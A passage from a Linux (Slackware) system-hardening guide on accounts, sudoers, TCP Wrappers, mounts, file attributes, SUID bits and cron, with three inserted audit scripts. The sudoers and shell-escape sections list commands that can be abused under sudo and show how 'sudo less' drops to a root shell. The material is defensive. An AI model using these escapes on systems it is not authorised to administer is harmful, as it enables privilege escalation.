    halt - 0
    mail - 0
    news - 46
    uucp - 17
    operator - 0
    games - 4
    ftp - 0
    smmsp - 1
    mysql - 2
    rpc - 0
    sshd - 0
    gdm - 0
    oprofile - 0
    apache - 0
    messagebus - 7
    haldaemon - 14
    pop - 0
    nobody - 3
    dentonj - 2595

Your numbers may vary.
To list the files owned by a particular user:

    root@darkstar:~# find / -user nobody -ls

Logins and ownership of files and directories are not the only uses for accounts. They can also be used to run daemons as a non-root user. The current processes and the accounting information can be used to determine which accounts are used.

    root@darkstar:~# ps -eo euser,ruser,suser,fuser,f,comm,label
    root@darkstar:~# sa -m
    root@darkstar:~# lastcomm

By default, the unused accounts have their shell set to /bin/false. This prevents the accounts from being used interactively. Some argue that deleting the accounts is excessive and unnecessary. I delete them.

Error generated when logging into an account with the shell set as /bin/false (from Slackware 11.0):

    darkstar login: test
    Password:
    *************************
    Linux 2.4.32
    Last login: Wed Jun 27 20:23:42 -0700 2001 on tty2
    No mail.
    Welcome to Linux 2.4.32 (tty2)

    darkstar login:

The unused accounts may vary and depend on the daemons that run on your system. I typically delete the following:

    root@darkstar:~# userdel adm

Repeat for: adm games gdm halt lp news operator oprofile pop rpc shutdown sync uucp

The accounts sync, halt, and shutdown don't work by default. They allow someone to su or log in to sync, halt, or shut down the system. A password would have to be set before they work, as well as adding them to any of the other files that can be used to restrict logins or the use of su. Unless you really want to give someone the ability to do any of the three, it's safe to delete the accounts.

    root@darkstar:~# su halt
    halt: must be superuser.
    root@darkstar:~# su shutdown
    shutdown: you must be root to do that!
    root@darkstar:~# userdel halt
    root@darkstar:~# userdel shutdown
    root@darkstar:~# userdel sync

Password aging:

Note: Don't use this if you like to make the /etc/passwd and the /etc/shadow files immutable (chattr +i ...). It gets ugly... If you let the password expire, you will not be able to log in until you reset the password.
But if the /etc/shadow file is immutable and cannot be changed, then you will not be able to log in. To fix the problem, you would have to boot tomsrtbt or a Linux boot CD, mount the hard drive partition where /etc is located, and remove the immutable attribute from /mnt/etc/shadow (chattr -i ...).

Set the maximum number of days a password remains valid. For users, disable the account after the password has expired and the account remains inactive for 30 days.

    root@darkstar:~# passwd -x 90 -w 7 root
    root@darkstar:~# passwd -x 90 -w 7 -i 30 dentonj

Check the status of each account and the integrity of the passwd file:

    root@darkstar:~# for i in `cat /etc/passwd | awk -F: '{print $1}'`; do
    > passwd -S $i
    > done
    root@darkstar:~# pwck

    man 1 passwd
    man 5 passwd
    man find
    man userdel
    man false
    man pwck
    man ps
    man sa
    man lastcomm

/etc/group:

According to the Linux Standard Base Specification 4.1, the only required groups are root, bin, and daemon. All other groups are optional. Delete any unused groups. The following lists the number of files and directories that belong to each group:

    root@darkstar:~# for i in `cat /etc/group | awk -F: '{print $1}'`; do
    > echo -n "$i - "
    > find / -group $i -ignore_readdir_race | wc -l
    > done
    root - 373328
    bin - 83
    daemon - 11
    sys - 1
    adm - 0
    tty - 147
    disk - 31
    lp - 12
    mem - 0
    kmem - 3
    wheel - 0
    floppy - 26
    mail - 6
    news - 47
    uucp - 16
    man - 0
    dialout - 4
    audio - 12
    video - 3
    cdrom - 2
    games - 0
    slocate - 3
    utmp - 4
    smmsp - 3
    tape - 0
    mysql - 2
    rpc - 0
    sshd - 0
    gdm - 0
    shadow - 4
    ftp - 0
    oprofile - 0
    apache - 1
    messagebus - 7
    haldaemon - 14
    plugdev - 2
    power - 0
    netdev - 0
    pop - 0
    scanner - 1
    nobody - 2
    nogroup - 2
    users - 2700
    console - 0

Your numbers may vary.
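The "passwd -S" loop and pwck above answer the question one account at a time. The script below is an added example, not part of the original document, that reads a passwd/shadow pair and reports, for every account, whether its shell allows an interactive login, whether its password field is usable, locked or empty, and which hash algorithm the field uses. That last column is how you confirm that the ENCRYPT_METHOD SHA512 and SHA_CRYPT_*_ROUNDS settings from /etc/login.defs actually took effect after the password change (they only apply to hashes set after the change). The passwd and shadow contents it runs on are constructed; the hash strings in them are placeholders, not real hashes.

```shell
#!/bin/sh
# Added example (not from the original document): one-pass audit of a
# passwd/shadow pair.  For each account print:
#   user  login(yes|no)  password(usable|locked|empty)  hash(sha512|sha256|md5|des|-)
# "login" is derived from the shell (/bin/false and /sbin/nologin block it),
# "password" from the shadow field ("" is empty, a leading ! or * is locked).
#
# Usage: account_audit <passwd> <shadow>      (real system: /etc/passwd /etc/shadow)
account_audit() {
    # Shadow is read first (FNR == NR), passwd second.
    awk -F: '
        FNR == NR { pw[$1] = $2; next }
        {
            user = $1; shell = $7; h = pw[user]
            state = "usable"
            if (h == "")           state = "empty"
            else if (h ~ /^[!*]/)  state = "locked"
            alg = "-"
            if (h ~ /^\$6\$/)      alg = "sha512"
            else if (h ~ /^\$5\$/) alg = "sha256"
            else if (h ~ /^\$1\$/) alg = "md5"
            else if (state == "usable") alg = "des"
            login = (shell == "/bin/false" || shell == "/sbin/nologin") ? "no" : "yes"
            print user, login, state, alg
        }' "$2" "$1"
}

# Accounts that can actually be used at a login prompt: interactive shell and
# a password that is not locked (an empty field counts as usable here).
interactive_accounts() {
    account_audit "$1" "$2" | awk '$2 == "yes" && $3 != "locked" { print $1 }'
}

# Usable passwords that are not SHA-512, i.e. hashes set before ENCRYPT_METHOD
# was changed (or never re-hashed since).
non_sha512_hashes() {
    account_audit "$1" "$2" | awk '$3 == "usable" && $4 != "sha512" { print $1 }'
}

# Constructed passwd/shadow for the demonstration.  "test" has an empty
# password field and a real shell; "legacy" still carries an MD5 hash.
demo_account_audit() {
    d=$(mktemp -d)
    cat > "$d/passwd" <<'EOF'
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
games:x:12:100:games:/usr/games:/bin/false
test:x:1001:100::/home/test:/bin/bash
legacy:x:1002:100::/home/legacy:/bin/false
dentonj:x:1000:100::/home/dentonj:/bin/bash
EOF
    cat > "$d/shadow" <<'EOF'
root:$6$rounds=500000$constructedsalt$constructedhash:15052:0:90:7:::
bin:*:9797:0:::::
games:*:9797:0:::::
test::15052:0:99999:7:::
legacy:$1$constructedsalt$constructedhash:13000:0:99999:7:::
dentonj:$6$rounds=500000$constructedsalt$constructedhash:15052:0:90:7:30::
EOF
    echo "interactive: $(interactive_accounts "$d/passwd" "$d/shadow" | paste -sd' ')"
    echo "not sha512:  $(non_sha512_hashes "$d/passwd" "$d/shadow" | paste -sd' ')"
    rm -rf "$d"
}

case "${1:-}" in demo) demo_account_audit ;; esac
```

The interactive list is what you compare against the accounts you intend to keep; everything else is a candidate for userdel or for a /bin/false shell. An empty password field is worse than a usable one, which is why it is not treated as locked.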
To list the files owned by a particular group:

    root@darkstar:~# find / -group nobody -ls

    root@darkstar:~# groupdel adm

Repeat for the following: adm games lp news pop uucp

    root@darkstar:~# grpck

Removing accounts may create a long list of files that no longer belong to any user or group. If you are interested in what the files are (the parentheses are needed so that "-ls" applies to both tests):

    root@darkstar:~# find / \( -nouser -o -nogroup \) -ls > unowned.out

To change the ownership of the files:

    root@darkstar:~# find / \( -nouser -o -nogroup \) -exec chown root:root {} \;

    man group
    man find
    man groupdel
    man grpck
    man chown

/etc/sudoers:

    Defaults runaspw
    Defaults !root_sudo
    Defaults ignore_dot
    Defaults tty_tickets
    Defaults requiretty
    Defaults listpw=always
    Defaults verifypw=always
    Defaults !path_info
    Defaults noexec
    Defaults passwd_timeout=1
    Defaults env_reset
    Defaults insults

    %wheel ALL=(ALL) ALL

    root@darkstar:~# groups dentonj
    dentonj : users
    root@darkstar:~# usermod -g users -G wheel dentonj
    root@darkstar:~# groups dentonj
    dentonj : users wheel
    root@darkstar:~# mkdir /var/run/sudo

There are a number of security concerns when allowing users to use sudo. Make sure you completely read the man pages for sudo and sudoers.

There are generally two approaches when configuring sudo. The first is to allow the user to run any command. This is essentially giving them su access to root. The second approach is to only allow a limited number of commands to be run. If you are going to use the second approach, there are a few commands that you don't want to allow the user to run. These commands can be abused to give the user full access to the system. Make sure you don't add the following, or those listed in the Shell Escapes section below, to the /etc/sudoers file:

    /bin/cat
    /bin/chmod
    /bin/chown
    /bin/cpio
    /bin/mount
    /bin/rpm
    /bin/tar
    /sbin/installpkg
    /usr/bin/env
    /usr/sbin/useradd
    /usr/sbin/usermod

This list should be much longer.
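The list above is only useful if someone checks sudoers against it after every edit. The script below is an added example, not part of the original document: it extracts the command part of each user specification in a sudoers file and reports any entry that grants one of the listed binaries, or "ALL" (which contains all of them). It does not expand Cmnd_Alias definitions, so an alias that hides one of these commands will not be reported; the sudoers content it runs on is constructed.

```shell
#!/bin/sh
# Added example (not from the original document): flag sudoers user
# specifications that delegate one of the commands the text says never to
# delegate.  Limitations: Cmnd_Alias names are not expanded, and only the
# first word of each command (the binary) is compared.
#
# Usage: risky_sudo_commands <sudoers>       (real system: /etc/sudoers)
# Prints "<who> <command>" for each match.
RISKY='/bin/cat /bin/chmod /bin/chown /bin/cpio /bin/mount /bin/rpm /bin/tar
/sbin/installpkg /usr/bin/env /usr/sbin/useradd /usr/sbin/usermod'

risky_sudo_commands() {
    # Keep user specification lines: drop comments, Defaults, alias definitions.
    grep -v '^[[:space:]]*#' "$1" \
    | grep -Ev '^[[:space:]]*(Defaults|Cmnd_Alias|User_Alias|Host_Alias|Runas_Alias)' \
    | grep '=' \
    | while IFS= read -r line; do
        who=${line%%[[:space:]]*}           # first word: user, %group or alias
        cmds=${line##*=}                    # text after the last "="
        cmds=${cmds##*\)}                   # drop a "(runas)" list if present
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r c; do
            c=${c##*:}                      # strip NOPASSWD:/NOEXEC: style tags
            c=$(printf '%s' "$c" | sed 's/^[[:space:]]*//; s/[[:space:]].*//')
            if [ "$c" = ALL ]; then
                echo "$who ALL"
                continue
            fi
            for r in $RISKY; do
                [ "$c" = "$r" ] && echo "$who $r"
            done
        done
    done
}

# Constructed sudoers for the demonstration.
demo_risky_sudo() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sudoers, not a real configuration
Defaults requiretty
Defaults passwd_timeout=1
Cmnd_Alias BACKUP = /usr/bin/rsync
%wheel  ALL=(ALL) ALL
dentonj ALL=(root) NOPASSWD: /bin/tar, /usr/bin/env
backup  ALL=(root) BACKUP
EOF
    risky_sudo_commands "$f" | paste -sd';'
    rm -f "$f"
}

case "${1:-}" in demo) demo_risky_sudo ;; esac
```

The "%wheel ALL" line is reported on purpose: it is the first approach from the text (full su-equivalent access), and the point of the check is to make that choice visible rather than to forbid it.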
    root@darkstar:~# sudo -V
    root@darkstar:~# sudo -L

    man sudo
    man sudoers
    man visudo
    man groups
    man usermod

/etc/ftpusers:

This file is used to deny anyone listed from being able to log into the local ftp server. Add the following:

    bin
    daemon
    haldaemon
    mail
    smmsp
    messagebus
    mysql
    sshd
    nobody

Add all system accounts that are present in /etc/passwd.

    man ftpusers

/etc/host.conf:

    nospoof on
    spoofalert on
    spoof warn

    man host.conf

/etc/hosts.allow:

TCP Wrappers

    all:local:banners /etc/banners:allow
    sshd:192.168.1.:banners /etc/banners:allow
    sendmail:all:banners /etc/banners:allow
    all:paranoid:spawn /usr/bin/logger "%d deny paranoid %c %p %a %h %u" \
        :banners /etc/banners:deny
    all:all:spawn /usr/bin/logger "%d deny %c %p %a %h %u" \
        :banners /etc/banners:deny

From `man hosts_options`:

    banners /some/directory
        Look for a file in `/some/directory` with the same name as the daemon
        process (for example in.telnetd for the telnet service), and copy its
        contents to the client.

If you are using any of the services listed below, make sure you add an allow rule for it. If you want a different banner for a particular service, delete the symlink and create a text file with the same name.
root@darkstar:~# mkdir /etc/banners && cd /etc/banners
root@darkstar:/etc/banners# ln -s ../issue.net afpd
root@darkstar:/etc/banners# ln -s ../issue.net imapd
root@darkstar:/etc/banners# ln -s ../issue.net in.identd
root@darkstar:/etc/banners# ln -s ../issue.net in.rexecd
root@darkstar:/etc/banners# ln -s ../issue.net in.rlogind
root@darkstar:/etc/banners# ln -s ../issue.net in.rshd
root@darkstar:/etc/banners# ln -s ../issue.net in.telnetd
root@darkstar:/etc/banners# ln -s ../issue.net popa3d
root@darkstar:/etc/banners# ln -s ../issue.net proftpd
root@darkstar:/etc/banners# ln -s ../issue.net rpc.mountd
root@darkstar:/etc/banners# ln -s ../issue.net sendmail
root@darkstar:/etc/banners# ln -s ../issue.net sshd
root@darkstar:/etc/banners# ln -s ../issue.net stunnel
root@darkstar:/etc/banners# ln -s ../issue.net uucico
root@darkstar:/etc/banners# ln -s ../issue.net vsftpd

A command that can be used to determine which daemons use TCP Wrappers:

root@darkstar:~# cd /usr/sbin; for i in `ls | grep -v "@$"`; do \
> echo " $i"; strings $i | grep hosts.allow; done | less

To test the /etc/hosts.allow settings:

root@darkstar:~# tcpdchk
root@darkstar:~# tcpdmatch sshd localhost
root@darkstar:~# tcpdmatch sshd 1.1.1.1
root@darkstar:~# tcpdmatch sshd 192.168.1.1

man tcpd
man 5 hosts_access
man hosts_options
man tcpdchk
man tcpdmatch

/etc/hosts.deny:

The only time this file will match is when /etc/hosts.allow is misconfigured.
all:all:spawn /usr/bin/logger "Check hosts.allow - %d deny %c %p %a %h %u" \
    :banners /etc/banners:deny

man tcpd
man 5 hosts_access
man hosts_options

xdm:

/etc/X11/xdm/xdm-config:

DisplayManager*authorize: true
DisplayManager*authName: XDM-AUTHORIZATION-1 MIT-MAGIC-COOKIE-1
DisplayManager.requestPort: 0

man xdm

/etc/X11/xdm/Xresources:

xlogin*greeting: Unauthorized Access Prohibited
xlogin*allowRootLogin: false
xlogin*allowNullPasswd: false

man xdm

xhost:

dentonj@darkstar:~$ xhost
access control enabled, only authorized clients can connect
dentonj@darkstar:~$

If the following line shows up:

INET:localhost

dentonj@darkstar:~$ xhost -localhost

man xhost
man Xsecurity
man Xau
man Xserver

/etc/kde/kdm/kdmrc:

You may not want to set some of these. For example, if the system uses a runlevel of 4 and is installed on a laptop, you may want to set "AllowShutdown=All". Read the comments in the file.

[Xdmcp]
Enable=false
Port=0
Willing=

[X-*-Core]
AllowRootLogin=false
AllowNullPasswd=false
AllowShutdown=Root
AllowSdForceNow=Root
UseSessReg=true

[X-:*-Core]
ServerArgsLocal=-nolisten tcp
AllowNullPasswd=false
AllowShutdown=Root
NoPassEnable=false
#NoPassUsers=

[X-:0-Core]
AutoLoginEnable=false
#AutoLoginUser=
#AutoLoginPass=

dentonj@darkstar:~$ /usr/share/config/kdm/Xwilling
2 users, load: 0.00, 0.00, 0.00

/etc/kde/kdm/Xaccess:

Comment out the following lines:

#*                              #any host can get a login window
#*      CHOOSER BROADCAST       #any indirect host can get a chooser

Access Control Lists:

/etc/fstab:

Add the acl mount option:

/dev/sda3   /   ext4   defaults,acl   1   1

root@darkstar:~# mount
/dev/root on / type ext4 (rw,relatime,barrier=1,data=ordered)
root@darkstar:~# mount -o remount,rw,relatime,acl,barrier=1,data=ordered /
root@darkstar:~# mount
/dev/root on / type ext4 (rw,relatime,acl,barrier=1,data=ordered)
root@darkstar:~# touch test
root@darkstar:~# getfacl test
# file: test
# owner: root
# group: root
user::rw-
group::r--
other::r--

root@darkstar:~# setfacl -m u:dentonj:rw test
root@darkstar:~# getfacl test
# file: test
# owner: root
# group: root
user::rw-
user:dentonj:rw-
group::r--
mask::rw-
other::r--

man acl
man setfacl
man getfacl

/etc/inittab:

Comment out the following line:

#ca::ctrlaltdel:/sbin/shutdown -t5 -r now

root@darkstar:~# telinit q

[rant]
I actually don't think this is necessary. But I'm including it because just about every security document on Linux recommends it. It stops anyone from being able to reboot the system by doing a three finger salute. Pressing Ctrl-Alt-Del to reboot the system only works if you have physical access to the keyboard. Even if you disable this feature, it doesn't stop someone from pulling the power cord or pressing the reset switch to force a reboot. Most window managers trap Ctrl-Alt-Del anyway. The only time that I see disabling the above line as being useful is when you have a Windows admin using Linux. You don't want them rebooting the system every time they want to lock the system or go to the Task Manager. Or you can use /etc/shutdown.allow to control when (not exactly who) the system can be rebooted with Ctrl-Alt-Del. There are security concerns with using this method. Check the man page for shutdown for details.
[/rant]

Add "-a" to the following line in /etc/inittab to use /etc/shutdown.allow:

ca::ctrlaltdel:/sbin/shutdown -t5 -r now -a

root@darkstar:~# telinit q

I like to use dumb terminals. Uncomment the following line:

s1:12345:respawn:/sbin/agetty -L ttyS0 9600 vt100

root@darkstar:~# telinit q

man init
man inittab
man initscript
man shutdown
man telinit

/etc/shutdown.allow:

dentonj

man shutdown

/etc/securetty:

Make sure only the following are uncommented:

console
tty1
tty2
tty3
tty4
tty5
tty6

man securetty

umask:

There are several ways to set umask:

/etc/login.defs:
UMASK 077

/etc/limits:
* K077

/etc/profile:
umask 077

Umask controls what the initial permissions are for newly created files and directories.
With a umask of 022, new files have the permissions 644 and new directories have the permissions 755. Setting the umask to 077 will result in new files being created with the permissions 600 and new directories with the permissions 700.

Using a umask of 077 will keep others from being able to access users' files. Using a umask of 022 will allow others access to users' files unless the user takes the time to change the permissions. You can use cron to periodically remove permissions from the users' home directories.

Setting a restrictive umask can cause problems when you commonly edit or create files that need to be readable by everyone. An example of files that everyone needs to be able to read are web server pages located in /srv/httpd/htdocs.

dentonj@darkstar:~$ type -a umask

man bash
man umask
man login.defs
man limits

----[ Filesystem ]----

/etc/fstab:

/dev/sda1   swap          swap    defaults                                                    0 0
/dev/sda2   /             ext4    defaults,acl                                                1 1
/dev/sda6   /var          ext4    rw,nosuid,nodev,acl,relatime,barrier=1,data=ordered         0 2
/dev/sda7   /tmp          ext4    rw,nosuid,nodev,noexec,acl,relatime,barrier=1,data=ordered  0 2
/dev/sda8   /usr          ext4    ro,acl                                                      0 2
/dev/sda9   /home         ext4    rw,nosuid,nodev,acl,relatime,barrier=1,data=ordered         0 0
/dev/sdb1   /mnt/windows  vfat    rw,nosuid,nodev,noexec,noauto                               0 0
/dev/sdb2   /mnt/slack    ext2    rw,noauto                                                   0 0
/dev/cdrom  /mnt/cdrom    auto    noauto,owner,ro                                             0 0
/dev/fd0    /mnt/floppy   auto    noauto,owner                                                0 0
devpts      /dev/pts      devpts  gid=5,mode=620                                              0 0
proc        /proc         proc    defaults                                                    0 0
tmpfs       /dev/shm      tmpfs   defaults                                                    0 0

root@darkstar:~# mkdir /mnt/windows
root@darkstar:~# mkdir /mnt/slack
root@darkstar:~# mkdir /mnt/floppy
root@darkstar:~# mkdir /mnt/thumb

The lines need to wrap. Mount complains about bad options if "\" is used to break up the lines.

Mounting /usr as read-only used to work, but I have not tested it with Slackware 13.1. Running "lsof" didn't turn up files that looked like they may be written to in /usr. Your mileage may vary.
Test extensively before using in a production environment. Before packages can be updated, /usr would have to be remounted as rw. This is more of a good idea fairy type of idea. I'm on the fence as to whether or not it adds any security to the system.

man fstab
man nfs
man mount

I used to add "noexec" to /home, but that mount option is pretty trivial to bypass. Besides, I like having a ~/bin directory for my scripts.

dentonj@darkstar:~$ /lib/ld-linux.so.2 ./some_executable

man ld.so

/sbin/tune2fs:

root@darkstar:~# tune2fs -l /dev/sda3

man tune2fs
man fsck

/usr/bin/chattr:

TODO

Make these files immutable:
- init/rc scripts
- shell, environment, login config files
- passwd files
- server config files
- suid/sgid executables
- commonly trojaned executables

for i in `ls /etc/rc.d`; do
    chattr +i /etc/rc.d/$i
done
for i in `ls /etc/apache`; do
    chattr +i /etc/apache/$i
done
for i in `ls /etc/mail`; do
    chattr +i /etc/mail/$i
done
find / -type f \( -perm -4000 -o -perm -2000 \) -exec chattr +i {} \;
chattr +i /etc/at.deny
chattr +i /etc/exports
chattr +i /etc/ftpusers
chattr +i /etc/host.conf
chattr +i /etc/hosts
chattr +i /etc/hosts.allow
chattr +i /etc/hosts.deny
chattr +i /etc/hosts.equiv
chattr +i /etc/hosts.lpd
chattr +i /etc/inetd.conf
chattr +i /etc/inittab
chattr +i /etc/lilo.conf
chattr +i /etc/login.access
chattr +i /etc/login.defs
chattr +i /etc/named.conf
chattr +i /etc/porttime
chattr +i /etc/profile
chattr +i /etc/protocols
chattr +i /etc/securetty
chattr +i /etc/services
chattr +i /etc/suauth
chattr +i /home/dentonj/.forward
chattr +i /home/dentonj/.netrc
chattr +i /home/dentonj/.rhosts
chattr +i /home/dentonj/.shosts

less /usr/local/sbin/chkrootkit
/TROJAN
chattr +i <the commands listed in the variable TROJAN>

This list should be much longer.

root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr

man chattr

lcap:

TODO

TODO - list where it can be found and how to compile it.

Remove the CAP_LINUX_IMMUTABLE kernel capability.
This prevents the +i attribute from being removed. I run `lcap` from rc.local. This file is sourced from the file rc.M. To remove the +i attribute from a file, you'll have to reboot the system and go into single user mode. This is one of the few times when you really have to reboot Linux. If you only access and manage the system remotely, using lcap may cause problems.

Note: Do this after you are finished with configuring your system.

/etc/rc.d/rc.local:

/usr/local/sbin/lcap CAP_LINUX_IMMUTABLE

root@darkstar:~# touch /tmp/test
root@darkstar:~# chattr +i /tmp/test
root@darkstar:~# lsattr /tmp/test
----i-------- /tmp/test
root@darkstar:~# cd
root@darkstar:~# lcap CAP_LINUX_IMMUTABLE
root@darkstar:~# chattr -i /tmp/test
chattr: Operation not permitted while setting flags on /tmp/test
root@darkstar:~# lcap
Current capabilities: 0xFFFFFCFF
   0) *CAP_CHOWN                  1) *CAP_DAC_OVERRIDE
   2) *CAP_DAC_READ_SEARCH        3) *CAP_FOWNER
   4) *CAP_FSETID                 5) *CAP_KILL
   6) *CAP_SETGID                 7) *CAP_SETUID
   8)  CAP_SETPCAP                9)  CAP_LINUX_IMMUTABLE
  10) *CAP_NET_BIND_SERVICE      11) *CAP_NET_BROADCAST
  12) *CAP_NET_ADMIN             13) *CAP_NET_RAW
  14) *CAP_IPC_LOCK              15) *CAP_IPC_OWNER
  16) *CAP_SYS_MODULE            17) *CAP_SYS_RAWIO
  18) *CAP_SYS_CHROOT            19) *CAP_SYS_PTRACE
  20) *CAP_SYS_PACCT             21) *CAP_SYS_ADMIN
  22) *CAP_SYS_BOOT              23) *CAP_SYS_NICE
  24) *CAP_SYS_RESOURCE          25) *CAP_SYS_TIME
  26) *CAP_SYS_TTY_CONFIG
    * = Capabilities currently allowed

/etc/cron.*:

root@darkstar:~# chmod -R go-rwx /etc/cron.*

/etc/rc.d:

The system startup scripts are world readable by default.
root@darkstar:~# chmod -R go-rwx /etc/rc.d/

$HOME:

Limit access to $HOME directories:

root@darkstar:~# chmod -R go-rwx /home/dentonj
root@darkstar:~# chmod -R go-rwx /root

man chmod

/var/log:

Limit access to logs:

root@darkstar:~# chmod -R o-rwx /var/log

The following files should be empty if they exist:

/etc/X0.hosts
/etc/d_passwd
/etc/dialups
/etc/environment
/etc/exports
/etc/hosts.lpd
/etc/hosts.equiv
/etc/ssh/shosts.equiv
~/.forward
~/.netrc
~/.rhosts
~/.shosts

Files that normally shouldn't exist:

/etc/fastboot
/etc/forcefsck
/etc/hushlogins
/etc/initrunlvl
/etc/initscript
/etc/nologin
/etc/powerstatus
/etc/upsstatus
~/.hushlogin

Find SUID/SGID files and directories:

root@darkstar:~# find / -type f \( -perm -4000 -o -perm -2000 \) \
> -ls > suid_files.out
root@darkstar:~# find / -type d \( -perm -4000 -o -perm -2000 \) \
> -ls > suid_dirs.out

Find world and group writable files and directories:

root@darkstar:~# find / -type f \( -perm -2 -o -perm -20 \) \
> -ls > write_files.out
root@darkstar:~# find / -type d \( -perm -2 -o -perm -20 \) \
> -ls > write_dirs.out

SUID/SGID:

TODO

Remove the SUID or SGID bit from the following files:

chmod u-s /usr/bin/at
chmod u-s /usr/bin/chage
chmod u-s /usr/bin/chfn
chmod u-s /usr/bin/chsh
chmod u-s /usr/bin/crontab
chmod u-s /usr/bin/expiry
chmod u-s /usr/bin/gpasswd
chmod u-s /usr/bin/lppasswd
chmod u-s /usr/bin/newgrp
chmod u-s /usr/bin/rcp
chmod u-s /usr/bin/rlogin
chmod u-s /usr/bin/rsh
chmod u-s /usr/libexec/ssh-keysign

man chmod

Shell Escapes:

The following is a list of programs that can escape to a shell. This can be done by directly starting a new shell, by executing shell commands (which can be used to start a shell), or by opening a text editor that can be used to start a shell. These programs are not a security concern by themselves. However, if they are set SUID root or used with sudo, the programs can allow users access to a root shell.
/etc/sudoers:

dentonj ALL = (ALL) /usr/bin/less /var/log/messages

Start a new shell:

dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages
Password:
<contents of /var/log/messages>
!
bash-3.00#

Open an editor that can start a new shell:

dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages
Password:
<contents of /var/log/messages>
v
:sh
bash-3.00#

Make sure these are not SUID and owned by root. Also make sure they don't end up in /etc/sudoers. This list is not complete.

/bin/ed
/bin/more
/usr/bin/bzmore
/usr/bin/crontab -e
/usr/bin/cscope
/usr/bin/cu
/usr/bin/cvs -e
/usr/bin/cvsbug
/usr/bin/elm
/usr/bin/elvis
/usr/bin/ex
/usr/bin/flea
/usr/bin/gccbug
/usr/bin/gdb
/usr/bin/less
/usr/bin/lftp
/usr/bin/mailto
/usr/bin/mc
/usr/bin/mcedit
/usr/bin/mcview
/usr/bin/mutt
/usr/bin/mysql
/usr/bin/mysqlbug
/usr/bin/nail
/usr/bin/ncftp
/usr/bin/newspost
/usr/bin/nn
/usr/bin/perlbug
/usr/bin/pilot
/usr/bin/pine
/usr/bin/pg
/usr/bin/rpcclient
/usr/bin/sdiff
/usr/bin/slrn
/usr/bin/smbclient
/usr/bin/tin
/usr/bin/trn
/usr/bin/uupick
/usr/bin/vim
/usr/bin/zmore

A couple of the things that I used to figure out which commands allow shell escapes (grep needs -E for the "|" alternation to work):

root@darkstar:~# cd /usr/bin && for i in `ls | grep -v "@$"`; do
> echo " $i"
> strings $i | grep -E "VISUAL|EDITOR"
> done | less
root@darkstar:~# cd /usr/man/man1 && zgrep -E \
> "\!.*command|execute.*command" *

Find (and then delete) dead symlinks; the command only lists them:

find / -type l -print | perl -nle '-e || print'

----[ Network ]----

/etc/rc.d/rc.local:

# Stop arp spoofing used to sniff switched networks
# Set a static ARP entry for the default gateway
arp -s 192.168.1.1 00:00:FE:ED:FA:CE
# Set a static ARP entry for the log host
arp -s 192.168.1.2 00:00:DE:AD:BE:EF

/etc/rc.d/rc.firewall:

The file /etc/rc.d/rc.inet2 checks for the existence of rc.firewall and then runs it. Create a firewall script and place it here.
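The SUID/SGID and group/world-writable searches from the Filesystem section above, as an added example that is not part of the original document: the same find expressions wrapped in functions and exercised on a constructed directory tree, so they can be checked before being pointed at "/".

```shell
#!/bin/sh
# Added example, not from the original document: the SUID/SGID and
# world/group-writable searches from the Filesystem section, wrapped in
# functions and exercised on a constructed directory tree so the find
# expressions can be checked before they are run against "/".

# Regular files with the SUID or SGID bit set below the given directory.
find_suid_sgid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print
}

# Files and directories writable by others (-perm -002, written "-perm -2"
# in the document) or by group (-perm -020, written "-perm -20").
find_group_world_writable() {
    find "$1" \( -type f -o -type d \) \( -perm -002 -o -perm -020 \) -print
}

# Build a constructed tree with one finding of each kind; the body runs in
# a subshell so the umask change does not leak into the caller.
make_sample_tree() (
    umask 077
    dir=$(mktemp -d) || exit 1
    touch "$dir/normal" "$dir/setuid_bin" "$dir/setgid_bin" "$dir/ww_file"
    mkdir "$dir/gw_dir" "$dir/safe_dir"
    chmod 4700 "$dir/setuid_bin"   # SUID, owner only
    chmod 2700 "$dir/setgid_bin"   # SGID, owner only
    chmod 666  "$dir/ww_file"      # world writable
    chmod 775  "$dir/gw_dir"       # group writable
    printf '%s\n' "$dir"
)

# Counts, so the results can be checked and compared between runs.
count_suid_sgid() { find_suid_sgid "$1" | wc -l | tr -d ' '; }
count_writable()  { find_group_world_writable "$1" | wc -l | tr -d ' '; }

# Stand-alone run: build the tree, report both lists, clean up.
if [ "${1:-}" = "--demo" ]; then
    d=$(make_sample_tree)
    echo "SUID/SGID:";            find_suid_sgid "$d"
    echo "group/world writable:"; find_group_world_writable "$d"
    rm -rf "$d"
fi
```

Run with `--demo` to see the two findings of each kind on the constructed tree; on a real system the output for "/" is what goes into suid_files.out and write_files.out.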
----[ Cron ]----

/etc/cron.daily/ntpdate:

#!/bin/sh
/usr/sbin/ntpdate clock.via.net && /sbin/hwclock --systohc

root@darkstar:~# chmod 700 /etc/cron.daily/ntpdate

/etc/cron.daily/cleanup:

#!/bin/sh
/usr/bin/find / -type f -name core -exec /bin/rm -f {} \;
/usr/bin/find /tmp -atime +7 -exec /bin/rm -f {} \;
/usr/bin/find /var/tmp -atime +7 -exec /bin/rm -f {} \;

root@darkstar:~# chmod 700 /etc/cron.daily/cleanup

/etc/cron.daily/paranoid:

#!/bin/sh
/bin/chmod -R go-rwx /home/dentonj
/bin/chmod -R go-rwx /root
/bin/chmod -R o-rwx /var/log
/bin/rm -f /home/dentonj/dead.letter

root@darkstar:~# chmod 700 /etc/cron.daily/paranoid

/var/spool/cron/crontabs/root:

0 3 * * * /usr/bin/find /home \( -name .rhosts -o -name .forward \) -ls

(The parentheses are needed; without them -ls applies only to .forward and .rhosts files are never listed.) Cron should mail the results to root.

root@darkstar:~# crontab -l
root@darkstar:~# crontab -e

man crond
man crontab

/etc/at.allow:

root@darkstar:~# rm /etc/at.deny
root@darkstar:~# touch /etc/at.allow

Don't allow anyone to use at. Even better, remove at from the system:

root@darkstar:~# removepkg at

man at

----[ Bash ]----

~/.bash_history:

Set the history file so that it can only be appended and not erased by a user.
root@darkstar:~# chattr +a /home/dentonj/.bash_history
root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr

man chattr
man lsattr
man chmod

~/.bash_profile:

trap 'test -n "$SSH_AGENT_PID" && eval `/usr/bin/ssh-agent -k`' 0

----[ Kernel ]----

/etc/sysctl.conf:

# Improve file system performance
vm.bdflush = 60 64 64 256 500 300 80 0 0
# Increase swap bandwidth system performance
